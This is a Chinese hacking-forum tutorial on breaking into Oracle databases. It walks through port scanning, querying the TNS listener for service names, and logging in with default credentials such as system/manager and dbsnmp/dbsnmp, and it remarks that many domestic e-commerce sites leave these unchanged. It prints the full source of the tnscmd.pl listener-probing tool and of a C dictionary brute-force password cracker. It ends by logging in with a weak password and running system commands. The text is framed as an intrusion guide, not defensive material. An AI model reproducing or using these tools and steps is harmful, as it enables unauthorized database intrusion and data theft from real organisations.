入侵oracle数据库的一些技巧

软件作者：pt007[at]vip.sina.com版权所有,转载请注明版权 
信息来源：邪恶八进制信息安全团队（www.eviloctal.com） 
一、先看下面的一个贴子: 

Oracle数据库是现在很流行的数据库系统，很多大型网站都采用Oracle，它之所以倍受用户喜爱是因为它有以下突出的特点： 

1、支持大数据库、多用户的高性能的事务处理。Oracle支持最大数据库，其大小可到几百千兆，可充分利用硬件设备。支持大量用户同时在同一数据上执行各种数据应用，并使数据争用最小，保证数据一致性。系统维护具有高的性能，Oracle每天可连续24小时工作，正常的系统操作(后备或个别计算机系统故障)不会中断数据库的使用。可控制数据库数据的可用性，可在数据库级或在子数据库级上控制。 

2、Oracle遵守数据存取语言、操作系统、用户接口和网络通信协议的工业标准。所以它是一个开放系统，保护了用户的投资。美国标准化和技术研究所(NIST)对Oracle7 SERVER进行检验，100%地与ANSI/ISO SQL89标准的二级相兼容。 

3、实施安全性控制和完整性控制。Oracle为限制各监控数据存取提供系统可靠的安全性。Oracle实施数据完整性，为可接受的数据指定标准。 

4、支持分布式数据库和分布处理。Oracle为了充分利用计算机系统和网络，允许将处理分为数据库服务器和客户应用程序，所有共享的数据管理由数据库管理系统的计算机处理，而运行数据库应用的工作站集中于解释和显示数据。通过网络连接的计算机环境，Oracle将存放在多台计算机上的数据组合成一个逻辑数据库，可被全部网络用户存取。分布式系统像集中式数据库一样具有透明性和数据一致性。 

具有可移植性、可兼容性和可连接性。由于Oracle软件可在许多不同的操作系统上运行，以致Oracle上所开发的应用可移植到任何操作系统，只需很少修改或不需修改。Oracle软件同工业标准相兼容，包括很多工业标准的操作系统，所开发应用系统可在任何操作系统上运行。可连接性是指ORALCE允许不同类型的计算机和操作系统通过网络可共享信息。 

虽然Oracle数据库具有很高的安全性，但是如果我们在配置的时候不注意安全意识，那么也是很危险的。也就是说，安全最主要的还是要靠人自己，而不能过分依赖软件来实现。 

我们知道，在mssql中，安装完成后默认有个sa的登陆密码为空，如果不更改就会产生安全漏洞。那么oracle呢?也有的。为了安装和调试的方便，Oracle数据库中的两个具有DBA权限的用户Sys和System的缺省密码是manager。笔者发现很多国内网站的Oracle数据库没有更改这两个用户的密码，其中也包括很多大型的电子商务网站， 我们就可以利用这个缺省密码去找我们感兴趣的东西。如何实现，看下面的文章吧。 

进行测试前我们先来了解一些相关的知识，我们连接一个Oracle数据库的时候，需要知道它的service_name或者是Sid值，就象mssql一样，需要知道数据库名。那如何去知道呢，猜?呵呵，显然是不行的。这里我们先讲讲oracle的TNS listener，它位于数据库Client和数据库Server之间，默认监听1521端口，这个监听端口是可以更改的。但是如果你用一个tcp的session去连接1521端口的话，oracle将不会返回它的banner，如果你输入一些东西的话，它甚至有可能把你踢出去。这里我们就需要用tnscmd.pl这个perl程序了，它可以查询远程oracle数据库是否开启(也就是ping了)，查询版本，以及查询它的服务名，服务状态和数据库服务名，而且正确率很高。 

理论方面的讲完了，如果还有什么不懂的可以去查找相关资料。现在开始测试吧，需要的工具有：ActivePerl，Oracle客户端，Superscan或者是其它扫描端口的软件， Tnscmd.pl。 

我们先用Superscan扫描开放了端口1521的主机，假设其IP是xx.xx.110.110，这样目标已经有了。然后我们要做的就是用Tnscmd.pl来查询远程数据库的服务名了，Tnscmd.pl的用法如下： 

　C:perlbin>perl tnscmd.pl 

usage: tnscmd.pl [command] -h hostname 

where 'command' is something like ping, version, status, etc. 

(default is ping) 

[-p port] - alternate TCP port to use (default is 1521) 

[--logfile logfile] - write raw packets to specified logfile 

[--indent] - indent & outdent on parens 

[--rawcmd command] - build your own CONNECT_DATA string 

[--cmdsize bytes] - fake TNS command size (reveals packet leakage) 


我们下面用的只有简单的几个命令，其他的命令也很好用，一起去发掘吧。 

然后我们就这样来： 

　C:perlbin>perl tnscmd.pl services -h xx.xx.110.110 -p 1521 –indent 

sending (CONNECT_DATA=(COMMAND=services)) to xx.xx.110.110:1521 

writing 91 bytes 

reading 

._.......6.........?. .......... 

DESCRIPTION= 

TMP= 

VSNNUM=135286784 

ERR=0 

SERVICES_EXIST=1 

.Q........ 

SERVICE= 

SERVICE_NAME=ORCL 

INSTANCE= 

INSTANCE_NAME=ORCL 

NUM=1 

INSTANCE_CLASS=ORACLE 

HANDLER= 

HANDLER_DISPLAY=DEDICATED SERVER 

STA=ready 

HANDLER_INFO=LOCAL SERVER 

HANDLER_MAXLOAD=0 

HANDLER_LOAD=0 

ESTABLISHED=447278 

REFUSED=0 

HANDLER_ID=8CA61D1BBDA6-3F5C-E030-813DF5430227 

HANDLER_NAME=DEDICATED 

ADDRESS= 

PROTOCOL=beq 

PROGRAM=/home/oracle/bin/oracle 

ENVS='ORACLE_HOME=/home/oracle,ORACLE_SID=ORCL' 

ARGV0=oracleORCL 

ARGS=' 

LOCAL=NO 

' 

.........@ 


从上面得到的信息我们可以看出数据库的服务名为ORCL，然后我们就可以通过sqlplus工具来远程连上它了，用户名和密码我们用默认的system/manager或者是sys/manager，其他的如mdsys/mdsys，ctxsys/ctxsys等，这个默认用户和密码是随版本的不同而改变的。如下： 

　C:oracleora90BIN>sqlplus /nolog 

SQL*Plus: Release 9.0.1.0.1 - Production on Thu May 23 11:36:59 2002 

(c) Copyright 2001 Oracle Corporation.　All rights reserved. 

SQL>connect system/manager@ 

(description=(address_list=(address=(protocol=tcp) 

(host=xx.xx.110.110)(port=1521))) 

(connect_data=(SERVICE_NAME=ORCL))); 

如果密码正确，那么就会提示connected，如果不行,再换别的默认用户名和密码。经过笔者的尝试一般用dbsnmp/dbsnmp都能进去。当然如果对方已经把默认密码改了，那我们只能换别的目标了。但是我发现很多都是不改的，这个就是安全意识的问题了。 


二、上面提到的两个小软件： 
tnscmd.pl 

Copy code 
#!/usr/bin/perl 
# 
# tnscmd - a lame tool to prod the oracle tnslsnr process (1521/tcp) 
# tested under Linux x86 & OpenBSD Sparc + perl5 
# 
# Initial cruft: [email]jwa@jammed.com[/email] 5 Oct 2000 
# 
# $Id: tnscmd,v 1.3 2001/04/26 06:45:48 jwa Exp $ 
# 
# see also: 
# [url]http://www.jammed.com/~jwa/hacks/security/tnscmd/tnscmd-doc.html[/url] 
# [url]http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2000-0818[/url] 
# [url]http://otn.oracle.com/deploy/security/alerts.htm[/url] 
# [url]http://xforce.iss.net/alerts/advise66.php[/url] 
# 
# GPL'd, of course. [url]http://www.gnu.org/copyleft/gpl.html[/url] 
# 
# $Log: tnscmd,v $ 
# Revision 1.3 2001/04/26 06:45:48 jwa 
# typo in url. whoops. 
# 
# Revision 1.2 2001/04/26 06:42:17 jwa 
# complete rewrite 
# - use IO::Socket instead of tcp_open 
# - got rid of pdump() 
# - put packet into @list and build it with pack() 
# - added --indent option 
# 
# 

use IO::Socket; 
use strict; # a grumpy perl interpreter is your friend 

select(STDOUT);$|=1; 

# 
# process arguments 
# 

my ($cmd) = $ARGV[0] if ($ARGV[0] !~ /^-/); 
my ($arg); 

while ($arg = shift @ARGV) { 
$main::hostname = shift @ARGV if ($arg eq "-h"); 
$main::port = shift @ARGV if ($arg eq "-p"); 
$main::logfile = shift @ARGV if ($arg eq "--logfile"); 
$main::fakepacketsize = shift @ARGV if ($arg eq "--packetsize"); 
$main::fakecmdsize = shift @ARGV if ($arg eq "--cmdsize"); 
$main::indent = 1 if ($arg eq "--indent"); 
$main::rawcmd = shift @ARGV if ($arg eq "--rawcmd"); 
$main::rawout = shift @ARGV if ($arg eq "--rawout"); 
} 

if ($main::hostname eq "") { 
print <<_EOF_; 
usage: $0 [command] -h hostname 
where 'command' is something like ping, version, status, etc. 
(default is ping) 
[-p port] - alternate TCP port to use (default is 1521) 
[--logfile logfile] - write raw packets to specified logfile 
[--indent] - indent & outdent on parens 
[--rawcmd command] - build your own CONNECT_DATA string 
[--cmdsize bytes] - fake TNS command size (reveals packet leakage) 
_EOF_ 
exit(0); 
} 

# with no commands, default to pinging port 1521 

$cmd = "ping" if ($cmd eq ""); 
$main::port = 1521 if ($main::port eq ""); # 1541, 1521.. DBAs are so whimsical 


# 
# main 
# 

my ($command); 

if (defined($main::rawcmd)) 
{ 
$command = $main::rawcmd; 
} 
else 
{ 
$command = "(CONNECT_DATA=(COMMAND=$cmd))"; 
} 


my $response = tnscmd($command); 
viewtns($response); 
exit(0); 


# 
# build the packet, open the socket, send the packet, return the response 
# 

sub tnscmd 
{ 
my ($command) = shift @_; 
my ($packetlen, $cmdlen); 
my ($clenH, $clenL, $plenH, $plenL); 
my ($i); 

print "sending $command to $main::hostname:$main::port/n"; 

if ($main::fakecmdsize ne "") 
{ 
$cmdlen = $main::fakecmdsize; 
print "Faking command length to $cmdlen bytes/n"; 
} 
else 
{ 
$cmdlen = length ($command); 
} 

$clenH = $cmdlen >> 8; 
$clenL = $cmdlen & 0xff; 

# calculate packet length 

if (defined($main::fakepacketsize)) 
{ 
print "Faking packet length to $main::fakepacketsize bytes/n"; 
$packetlen = $main::fakepacketsize; 
} 
else 
{ 
$packetlen = length($command) + 58; # "preamble" is 58 bytes 
} 

$plenH = $packetlen >> 8; 
$plenL = $packetlen & 0xff; 

$packetlen = length($command) + 58 if (defined($main::fakepacketsize)); 

# decimal offset 
# 0: packetlen_high packetlen_low 
# 26: cmdlen_high cmdlen_low 
# 58: command 

# the packet. 

my (@packet) = ( 
$plenH, $plenL, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 
0x01, 0x36, 0x01, 0x2c, 0x00, 0x00, 0x08, 0x00, 
0x7f, 0xff, 0x7f, 0x08, 0x00, 0x00, 0x00, 0x01, 
$clenH, $clenL, 0x00, 0x3a, 0x00, 0x00, 0x00, 0x00, 
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
0x00, 0x00, 0x00, 0x00, 0x34, 0xe6, 0x00, 0x00, 
0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
0x00, 0x00 
); 


for ($i=0;$i<length($command);$i++) 
{ 
push(@packet, ord(substr($command, $i, 1))); 
} 

my ($sendbuf) = pack("C*", @packet); 

print "connect "; 
my ($tns_sock) = IO::Socket::INET->new( 
PeerAddr => $main::hostname, 
PeerPort => $main::port, 
Proto => 'tcp', 
Type => SOCK_STREAM, 
Timeout => 30) || die "connect to $main::hostname failure: $!"; 
$tns_sock->autoflush(1); 

print "/rwriting " . length($sendbuf) . " bytes/n"; 

if (defined($main::logfile)) 
{ 
open(SEND, ">$main::logfile.send") || die "can't write $main::logfile.send: $!"; 
print SEND $sendbuf || die "write to logfile failed: $!"; 
close(SEND); 
} 

my ($count) = syswrite($tns_sock, $sendbuf, length($sendbuf)); 

if ($count != length($sendbuf)) 
{ 
print "only wrote $count bytes?!"; 
exit 1; 
} 

print "reading/n"; 

# get fun data 
# 1st 12 bytes have some meaning which so far eludes me 

if (defined($main::logfile)) 
{ 
open(REC, ">$main::logfile.rec") || die "can't write $main::logfile.rec: $!"; 
} 

my ($buf, $recvbuf); 

# read until socket EOF 
while (sysread($tns_sock, $buf, 128)) 
{ 
print REC $buf if (defined($main::logfile)); 
$recvbuf .= $buf; 
} 
close (REC) if (defined($main::logfile)); 
close ($tns_sock); 
return $recvbuf; 
} 


sub viewtns 
{ 
my ($response) = shift @_; 

# should have a hexdump option . . . 

if ($main::raw) 
{ 
print $response; 
} 
else 
{ 
$response =~ tr//200-/377//000-/177/; # strip high bits 
$response =~ tr//000-/027//./; 
$response =~ tr//177//./; 

if ($main::indent) 
{ 
parenify($response); 
} 
else 
{ 
print $response; 
} 
print "/n"; 
} 
} 


sub parenify 
{ 
my ($buf) = shift @_; 
my ($i, $c); 
my ($indent, $o_indent); 

for ($i=0;$i<length($buf);$i++) 
{ 
$c = substr($buf, $i, 1); 
$indent++ if ($c eq "("); 
$indent-- if ($c eq ")"); 
if ($indent != $o_indent) 
{ 
print "/n" unless(substr($buf, $i+1, 1) eq "("); 
print " " x $indent; 
$o_indent = $indent; 
undef $c; 
} 
print $c; 
} 
} 





Copy code 
/*用链表实现的oracle密码暴破程序,需要在本地安装oralce*/ 
#define WIN32_LEAN_AND_MEAN 
#if defined(_WIN32) || defined(_WIN64) 
#include <windows.h> 
#include <Tchar.h> 
#endif 
#include <winsock2.h> 
#include <stdio.h> 
#include <stdlib.h> 
#include <lmcons.h> 
#include <winnetwk.h> 
#include <time.h> 
#include <stdlib.h> 
#include <stdlib.h> 
#include <iostream> 
#include <occi.h> 


#pragma comment(lib, "oraocci9.lib") //链接到oraocci9.lib库 
//#pragma comment(lib, "msvcrt.lib") 
#pragma comment(lib, "msvcprt.lib") 
//链接到WS2_32.LIB库: 
#pragma comment(lib, "Ws2_32.lib") 
//#pragma comment(lib, "liboracle.lib") 

char target[40]= {0};//目标服务器 
char port[40]={0};//SQL端口号 
char db[40]={0};//数据库名 

//定义链表: 
typedef struct PassNode{ 
TCHAR password[100]; 
struct PassNode * Next; 
} PassInfo; 

typedef struct NameNode{ 
TCHAR Name[100]; 
struct NameNode * Next; 
}NameInfo; //定义NameInfo来表示NameNode结构 

// 
//函数SQLCheck 
//功能:尝试用不同密码连接SQL Server,探测出正确的密码 
// 
DWORD WINAPI SQLCheck(PVOID pPwd,PVOID uUserName) 
{ 
//定义局部变量 
char szBuffer[1025]= {0}; 
char *pwd=NULL,*UserName=NULL; 
char DataBase[255]={0}; 
//char *user=NULL; 
//取得传递过来准备探测的密码 
pwd=(char *)pPwd; 
UserName=(char *)uUserName; 
//DataBase=(char *)db; 
sprintf(DataBase,"(description=(address_list=(address=(protocol=tcp)(host=%s)(port=%s)))(connect_data=(SERVICE_NAME=%s)))",target,port,db); 
//printf("DataBase=%s/n",DataBase); 
using namespace std; 
using namespace oracle::occi; 

Environment * env=Environment::createEnvironment(Environment::DEFAULT); 

try{ 
Connection *conn=env->createConnection(UserName,pwd,(char *)DataBase); 
if (conn) 
{ printf("/n"); 
cout << "SUCCESS - createConnection" << endl; 

//连接远程oracle Server数据库成功 
return 1; 
} 
else 
cout << "FAILURE - createConnection" << endl; 
return 0; 

/*Statement*stmt=conn->createStatement("select * from emp"); 
ResultSet * rset=stmt->executeQuery(); 
while (rset->next()) { 
cout<<"the empno is:"<<rset->getInt(1)<<endl; 
cout<<"the ename is:"<<rset->getString(2)<<endl; 

} */ 
//stmt->closeResultSet (rset); 
// conn->terminateStatement (stmt); 
env->terminateConnection (conn); 

}catch(SQLException ex) 

{ 
//printf("/n"); 
cout<<ex.getMessage(); 
return 0; 

} 
Environment::terminateEnvironment(env); 
return 0; 


} 




void usage(){ 

printf("name:oracle password crack v 1.0/n"); 
printf("author:pt007@vip.sina.com/n/n"); 
fprintf(stdout,"usage : oracle_pwd_crack [ip] [options]/n"); 
printf("options:/n" 
"/t-x port specify the port of oracle/n" 
"/t-u username specify the username of oracle/n" 
// "/t-p password specify the password of oracle/n" 
"/t-d dict specify the dictionary/n" 
"/t-i database specify the database's name/n" 
//"/t-a automode automatic crack the oracle password /n" 
//"/tNote: when u use the -a option, named the username dict user.dic/n" 
// "/t password dict pass.dic/n" 
); 
printf("/nexample: oracle_pwd_crack 127.0.0.1 -x 1521 -u sql_user.dic -d pass.dic -i PLSExtProc/n");

exit(1); 

} 

//创建密码链表: 
PassInfo * Create_Pass_link(int NodeNum, FILE * DictFile){ 

/* read data from password dictionary, init the link */ 
TCHAR * szTempPass = NULL; 
PassInfo *h, *p, *s; /* *h point to head node, *p point to the pre node, 
*s point to the current node*/ 
int i; /* counter*/ 

//分配内存空间在内存的动态存储区中分配一块长度为"sizeof(PassInfo)"字节的连续区域,函数的返回值为该区域的首地址: 
if ( (h = (PassInfo *) malloc(sizeof(PassInfo))) == NULL ) 
{ 
fprintf(stderr, "malloc failed %d", GetLastError()); 
exit(0); 
} /* create the head node */ 

/* init the head node*/ 
h->Next = NULL; 
p = h; 

for ( i=0; i < NodeNum; i ++) //下面是建立链表,每个密码对应一个结点: 
{ //按sizeof(TCHAR)的长度分配100块连续的区域,并把指向TCHAR类型指针的首地址赋予指针变量szTempPass 
szTempPass = (TCHAR *)calloc(100, sizeof(TCHAR)); 
ZeroMemory(szTempPass, 100); 

if ( (s = (PassInfo *)malloc(sizeof(PassInfo))) == NULL) 
{ 
fprintf(stderr, "malloc failed %d", GetLastError()); 
exit(0); 
} 

memset(s->password, '/0', 100); 
fgets(szTempPass, 100, DictFile); 
strncpy(s->password, szTempPass, strlen(szTempPass)-1); 
s->Next =NULL; //删除一个结点 
p->Next = s;//链表指针指向下一个结构地址 
p = s;//下一个结构的数据域赋值 

free(szTempPass);//释放内存空间 

} 

return h;//返回链表的头结点,它存放有第一个结点的首地址,没有数据 

} 


//创建用户名链表: 
NameInfo * Create_Name_link(int NodeNum, FILE * DictFile){ 

/* read data from password dictionary, init the link */ 
TCHAR * szTempName = NULL; 
NameInfo *h, *p, *s; /* *h point to head node, *p point to the pre node, 
*s point to the current node*/ 
int i; /* counter*/ 

//分配内存空间在内存的动态存储区中分配一块长度为"sizeof(NameInfo)"字节的连续区域,函数的返回值为该区域(此处为NameInfo结构的首地址)的首地址: : 
if ( (h = (NameInfo *) malloc(sizeof(NameInfo))) == NULL ) 
{ 
fprintf(stdout, "malloc failed %d", GetLastError()); 
exit(0); 
} /* create the head node */ 

/* init the head node*/ 
h->Next = NULL; //删除下一个结点 
p = h; //p里面目前指向头结点 

for ( i=0; i < NodeNum; i ++) 
{//按sizeof(TCHAR)的长度分配100块连续的区域,并把指向TCHAR类型指针的首地址赋予指针变量szTempPass: 
szTempName = (TCHAR *)calloc(100, sizeof(TCHAR)); 
ZeroMemory(szTempName, 100);//字符串类型变量清0 

if ( (s = (NameInfo *)malloc(sizeof(NameInfo))) == NULL) 
{ 
fprintf(stdout, "malloc failed %d", GetLastError()); 
exit(0); 
} 

memset(s->Name, '/0', 100); 
fgets(szTempName, 100, DictFile); 
strncpy(s->Name, szTempName, strlen(szTempName)-1); 
s->Next =NULL; 
p->Next = s;//p指向下一个结点的地址 
p = s;//下一个结构的数据域赋值 

free(szTempName); 

} 

return h; 

} 


int LineCount(FILE * fd) //返回字典中的密码数量 
{ 
int countline = 0; 
char data[100] = {0};//字符数组清0 

while (fgets(data, 100, fd))//从指定的文件中读一个字符串到字符数组中 
countline++; 

rewind(fd);//指针返回到文件起始处 

return countline; 

} 

BOOL IsPortOpen(char * address, int port) 
{ 
int recv = 1; 
WSADATA wsadata; 
int fd; 
struct sockaddr_in clientaddress; 
struct hostent * host1; 
BOOL Result = FALSE; 
struct timeval timer4; 
fd_set writefd; //检查数据是否可写 
ULONG value = 1; 
//初使化winsock版本1.1: 
recv = WSAStartup(MAKEWORD(1,1), &wsadata); 

if(recv != 0) 
{ 
printf("init failed %d./n",WSAGetLastError()); 
return(0); 
} 

if ( LOBYTE( wsadata.wVersion ) != 1 || 
HIBYTE( wsadata.wVersion ) != 1 ) { 
/* Tell the user that we couldn't find a useable */ 
/* winsock.dll. */ 
WSACleanup(); 
return(0); 
} 
//创建socket套接字连接: 
fd = socket(AF_INET,SOCK_STREAM,IPPROTO_TCP); 
if(fd < 0) 
{ 

printf("[-] Create socket error %d. /n",WSAGetLastError()); 
return(0); 
} 
//将套接字fd设为非阻塞模式的方法: 
ioctlsocket(fd,FIONBIO,&value); 

if (!(host1 = gethostbyname(address))){ 
printf("[-] Gethostbyname(%s) error %d./n",address,WSAGetLastError()); 
return(0); 
} 

memset(&clientaddress, 0, sizeof(struct sockaddr)); 
clientaddress.sin_family =AF_INET;//Ipv4地址族 
clientaddress.sin_port = htons((unsigned short)port); 
clientaddress.sin_addr = *((struct in_addr *)host1->h_addr); 

timer4.tv_sec = 5;//以秒为单位指定等待时间 
timer4.tv_usec = 0; 

FD_ZERO(&writefd); 
FD_SET(fd,&writefd); //将套接字fd增添到writefd写集合中进行测试 

recv = connect(fd, (struct sockaddr *)&clientaddress, sizeof(struct sockaddr)); 

if( FD_ISSET(fd, &writefd)) 
{ 
recv = select(fd+1, NULL, &writefd, NULL, &timer4);//测试5秒钟内是否有数据写入 

if( recv > 0 ) 
Result = TRUE; 
} 

closesocket(fd); 
WSACleanup(); 

return Result; 

} 


int main(int argc, char **argv) 
{ 

PassInfo * head, * curr = NULL; 
NameInfo * headnode, * currnode = NULL; 
int namecount = 0, passcount = 0; 

///////////////////////////////////////////////////////////////////////////////////////////// 
// deal with the command line 
// 
///////////////////////////////////////////////////////////////////////////////////////////// 
//参数不为8个的时候打印帮助 
if(argc != 10) 
usage(); 

if (argc == 10) 
{ 
if ( strcmpi(argv[2], "-x") ) 
usage(); 

if ( strcmpi(argv[4], "-u") ) 
usage(); 

if ( strcmpi(argv[6], "-d") ) 
usage(); 
if ( strcmpi(argv[8], "-i") ) 
usage(); 

} 



/* determinate whether the oracle port is open */ 
if( !IsPortOpen(argv[1], atoi(argv[3]) ) ) 
{ 
printf("error:Can't connect to %s:%d/n", argv[1], atoi(argv[3])); 
exit(0); 
} 


//////////////////////////////////////////////////////////////////////////////////////////// 
// specifiy the username 
////////////////////////////////////////////////////////////////////////////////////////////// 

//取得目标地址和端口号: 
strcpy(target,argv[1]); 
strcpy(port,argv[3]); 
strcpy(db,argv[9]); 

if ( !strcmpi(argv[4], "-u")) 
{ 
/* open the password dictionary */ 

FILE * passdic = NULL; 
if ( (passdic = fopen(argv[7], "r")) ==NULL){ 
fprintf(stdout, "Can't open the password dictionary/n"); 
exit(0); 
} 



/* count line of name dictionary */ 

passcount = LineCount(passdic); //计算密码的数量 
head = Create_Pass_link(passcount, passdic); /* create the password link */ 
curr = head ->Next; //指向第一个结点 

/* open the password dictionary */ 

FILE * Namedict = NULL; 
if ( (Namedict = fopen(argv[5], "r")) ==NULL){ 
fprintf(stderr, "Can't open the name dictionary/n"); 
exit(0); 
} 

/*密码最终保存文件*/ 
FILE *passtxt=NULL; 
if ( (passtxt = fopen("pass.txt", "at+")) ==NULL){ 
fprintf(stdout, "Can't write pass.txt file!/n"); 
exit(0); 
} 

/* count line of name dictionary */ 

namecount = LineCount(Namedict);//计算用户名数量 
headnode = Create_Name_link(namecount, Namedict); /* create user link */ 
currnode = headnode->Next; 

int j=0,i=1; 
while(currnode!=NULL) //为NULL表示姓名链表结束 
{ 
printf("/n开始第%d位用户%s测试:/n",++j,currnode->Name); 
while(curr != NULL) //为NULL表示密码链表结束 
{ 
printf("Now cracking %s->%s /n", currnode->Name, curr->password); 
fflush(NULL); 
int Cracked=0; 
Cracked=SQLCheck(curr->password,currnode->Name); 
if ( Cracked==1 ) 
{ 
printf("%d.Successfully:oracle server %s's username [%s] password [%s]/n",j,target,currnode->Name, curr->password); 
fseek(passtxt, 0L, SEEK_END);//移动到文件尾部 
fprintf(passtxt,"%d.Successfully:oracle server %s's username [%s] password [%s]/r/n",i++,target,currnode->Name, curr->password); 
//exit(0);发现一个密码就退出 
break; 
} 
curr = curr->Next;//移动到下一个结点 
Sleep(100);//暂停100ms,即0.1s 

} /* starting crack the oracle password*/ 
currnode = currnode->Next; 
curr = head ->Next; //移到密码链表的第一个结点 
} 
printf("/n/n密码猜解结束:/n本次共猜解了%d位用户,%d个密码!/n",namecount,passcount); 
printf("请使用/"type pass.txt/"来查看当前目录下的pass.txt文件!/n"); 
fprintf(passtxt,"/r/n/r/n"); 
fclose(passdic); 
fclose(Namedict); 
fclose(passtxt); 
free(head); 


} 



return 0; 

} 
三、利用弱口令进行入侵: 
C:/>sqlplus /nolog 
SQL> connect system/manager@(description=(address_list=(address=(protocol=tcp)(host=www.xx.com)(port=1521)))(connect_data=(SERVICE_NAME=ora9i))); 

然后利用Oracle Execute Command Sql Script来执行系统命令